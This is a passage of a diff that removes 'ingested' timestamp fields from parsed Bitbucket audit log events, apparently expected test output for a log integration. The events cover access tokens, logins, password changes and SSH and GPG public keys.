@@ -2447,7 +2415,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokencreated.personal", - "ingested": "2021-12-24T00:37:41.020794751Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token created\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokencreated.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"dddd\\\",\\\"permissions\\\":[\\\"PROJECT_READ\\\",\\\"REPO_READ\\\"]}\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddd\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"PROJECT_READ, REPO_READ\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035618,\"nano\":996000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2536,7 +2503,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.personal", - "ingested": "2021-12-24T00:37:41.020795555Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"dddd\",\"i18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"key\":\"Name\",\"to\":\"ddddcccc\"}],\"extraAttributes\":[{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_READ\\\",\\\"REPO_READ\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035626,\"nano\":125000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2625,7 +2591,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.personal", - "ingested": "2021-12-24T00:37:41.020796394Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"PROJECT_READ, REPO_READ\",\"i18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"key\":\"Permissions\",\"to\":\"PROJECT_ADMIN, REPO_ADMIN\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_ADMIN\\\",\\\"REPO_ADMIN\\\"]}\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035632,\"nano\":18000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2716,7 +2681,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokendeleted.personal", - "ingested": "2021-12-24T00:37:41.020797143Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token deleted\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokendeleted.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"PROJECT_ADMIN, REPO_ADMIN\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_ADMIN\\\",\\\"REPO_ADMIN\\\"]}\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"ddddcccc\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035636,\"nano\":893000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -2784,7 +2748,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020797878Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035642,\"nano\":547000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -2863,7 +2826,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020798608Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"186\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:54:02.547Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 186\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035642,\"nano\":652000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -2914,7 +2876,6 @@ }, "event": { "action": "bitbucket.web.audit.action.logoutsuccess", - "ingested": "2021-12-24T00:37:41.020799402Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged out\",\"actionI18nKey\":\"bitbucket.web.audit.action.logoutsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035673,\"nano\":144000000},\"version\":\"1.0\"}", "type": [ "end" 
@@ -2986,7 +2947,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020800191Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationfailure\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Error\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authenticationfailure.error\",\"value\":\"Authentication failed because the user does not exist, the account is inactive, or the provided credentials are incorrect\"},{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"form\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdfasdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035678,\"nano\":580000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationfailure", 
@@ -3055,7 +3015,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020800932Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"form\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035683,\"nano\":620000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -3124,7 +3083,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020801660Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035691,\"nano\":210000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -3203,7 +3161,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020802384Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 191\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:54:51.210Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"191\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035691,\"nano\":275000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3267,7 +3224,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020803186Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User password changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035857,\"nano\":606000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", 
@@ -3364,7 +3320,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeycreated", - "ingested": "2021-12-24T00:37:41.020803916Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added SSH access key to profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeycreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"1\"},{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":1,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035891,\"nano\":80000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3465,7 +3420,6 @@ }, "event": { "action": "bitbucket.plugins.gpg.audit.action.gpgevent.created", - "ingested": "2021-12-24T00:37:41.020804652Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"GPG key created\",\"actionI18nKey\":\"bitbucket.plugins.gpg.audit.action.gpgevent.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Subkeys\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.subkeys\",\"value\":\"{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}\"},{\"name\":\"Key text\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.text\",\"value\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: GnuPG v1\\r\\nComment: See Alan's GPG guide at https://futureboy.us/pgp.html\\r\\n\\r\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\r\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\"},{\"name\":\"Email\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.email\",\"value\":\"eliasen@mindspring.com\"},{\"name\":\"Fingerprint\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.fingerprint\",\"value\":\"ec2392f2ede74488680da3cf5f2b4756ed873d23\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.id\",\"value\":\"5f2b4756ed873d23\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"5f2b4756ed873d23\\\",\\\"fingerprint\\\":\\\"ec2392f2ede74488680da3cf5f2b4756ed873d23\\\",\\\"key-text\\\":\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\\\r\\\\nVersion: GnuPG v1\\\\r\\\\nComment: See Alan's GPG guide at 
https://futureboy.us/pgp.html\\\\r\\\\n\\\\r\\\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\\\r\\\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\\\",\\\"sub-keys\\\":[{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}],\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035948,\"nano\":272000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3566,7 +3520,6 @@ }, "event": { "action": "bitbucket.plugins.gpg.audit.action.gpgevent.deleted", - "ingested": "2021-12-24T00:37:41.020805384Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"GPG key deleted\",\"actionI18nKey\":\"bitbucket.plugins.gpg.audit.action.gpgevent.deleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Subkeys\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.subkeys\",\"value\":\"{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}\"},{\"name\":\"Key text\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.text\",\"value\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: GnuPG v1\\r\\nComment: See Alan's GPG guide at https://futureboy.us/pgp.html\\r\\n\\r\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\r\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\"},{\"name\":\"Email\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.email\",\"value\":\"eliasen@mindspring.com\"},{\"name\":\"Fingerprint\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.fingerprint\",\"value\":\"ec2392f2ede74488680da3cf5f2b4756ed873d23\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.id\",\"value\":\"5f2b4756ed873d23\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"5f2b4756ed873d23\\\",\\\"fingerprint\\\":\\\"ec2392f2ede74488680da3cf5f2b4756ed873d23\\\",\\\"key-text\\\":\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\\\r\\\\nVersion: GnuPG v1\\\\r\\\\nComment: See Alan's GPG guide at 
https://futureboy.us/pgp.html\\\\r\\\\n\\\\r\\\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\\\r\\\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\\\",\\\"sub-keys\\\":[{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}],\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035955,\"nano\":721000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3657,7 +3610,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeydeleted", - "ingested": "2021-12-24T00:37:41.020806122Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted SSH access key from profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeydeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"1\"},{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":1,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa 
